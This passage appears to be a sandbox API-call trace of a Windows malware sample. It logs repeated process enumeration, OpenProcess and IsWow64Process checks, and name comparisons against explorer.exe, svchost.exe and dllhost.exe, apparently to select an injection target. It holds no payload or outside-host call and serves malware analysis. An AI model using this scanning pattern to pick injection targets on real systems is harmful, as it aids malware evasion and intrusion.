lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0194.024] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0194.024] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0194.024] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0194.025] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0194.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0194.025] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0194.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0194.026] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.026] CloseHandle (hObject=0xd8) returned 1 [0194.026] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0194.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0194.026] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.026] CloseHandle (hObject=0xd8) returned 1 [0194.026] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0194.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0194.027] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.027] CloseHandle (hObject=0xd8) returned 1 [0194.027] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0194.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0194.027] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.028] CloseHandle (hObject=0xd8) returned 1 [0194.028] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0194.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0194.028] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.028] CloseHandle (hObject=0xd8) returned 1 [0194.028] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0194.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0194.029] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.029] CloseHandle (hObject=0xd8) returned 1 [0194.029] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0194.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0194.029] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.029] CloseHandle (hObject=0xd8) returned 1 [0194.029] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0194.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0194.030] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.030] CloseHandle (hObject=0xd8) returned 1 [0194.030] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0194.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0194.030] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.030] CloseHandle (hObject=0xd8) returned 1 [0194.031] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0194.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0194.031] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.031] CloseHandle (hObject=0xd8) returned 1 [0194.031] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0194.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0194.032] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.032] CloseHandle (hObject=0xd8) returned 1 [0194.032] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0194.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0194.032] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.032] CloseHandle (hObject=0xd8) returned 1 [0194.032] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0194.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0194.033] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.033] CloseHandle (hObject=0xd8) returned 1 [0194.033] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0194.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0194.033] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.033] CloseHandle (hObject=0xd8) returned 1 [0194.033] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0194.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0194.034] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.034] CloseHandle (hObject=0xd8) returned 1 [0194.034] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0194.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0194.035] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.035] CloseHandle (hObject=0xd8) returned 1 [0194.035] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0194.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0194.035] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.035] CloseHandle (hObject=0xd8) returned 1 [0194.035] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0194.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0194.036] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.036] CloseHandle (hObject=0xd8) returned 1 [0194.036] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0194.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0194.036] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.036] CloseHandle (hObject=0xd8) returned 1 [0194.036] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0194.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0194.037] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.037] CloseHandle (hObject=0xd8) returned 1 [0194.037] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0194.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0194.038] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.038] CloseHandle (hObject=0xd8) returned 1 [0194.038] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0194.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0194.038] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0194.039] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0194.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0194.039] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0194.040] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0194.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0194.040] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0194.041] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0194.041] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.041] CloseHandle (hObject=0xd8) returned 1 [0194.041] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0194.041] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0194.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0194.042] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.042] CloseHandle (hObject=0xd8) returned 1 [0194.042] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0194.042] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0194.042] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0194.042] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0194.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0194.042] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0194.043] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.043] CloseHandle (hObject=0xd8) returned 1 [0194.043] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0194.044] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.044] CloseHandle (hObject=0xd8) returned 1 [0194.044] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0194.044] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0194.044] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.044] CloseHandle (hObject=0xd8) returned 1 [0194.044] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.045] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0194.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0194.045] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0194.045] CloseHandle (hObject=0xd8) returned 1 [0194.045] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0194.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0194.046] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0194.046] CloseHandle (hObject=0xd4) returned 1 [0194.046] Sleep (dwMilliseconds=0x3e8) [0195.081] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0195.083] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0195.084] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0195.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0195.086] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0195.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0195.087] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0195.088] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0195.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0195.088] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0195.089] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0195.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0195.089] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0195.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0195.090] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0195.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0195.090] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0195.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0195.091] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0195.091] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0195.092] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0195.092] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, 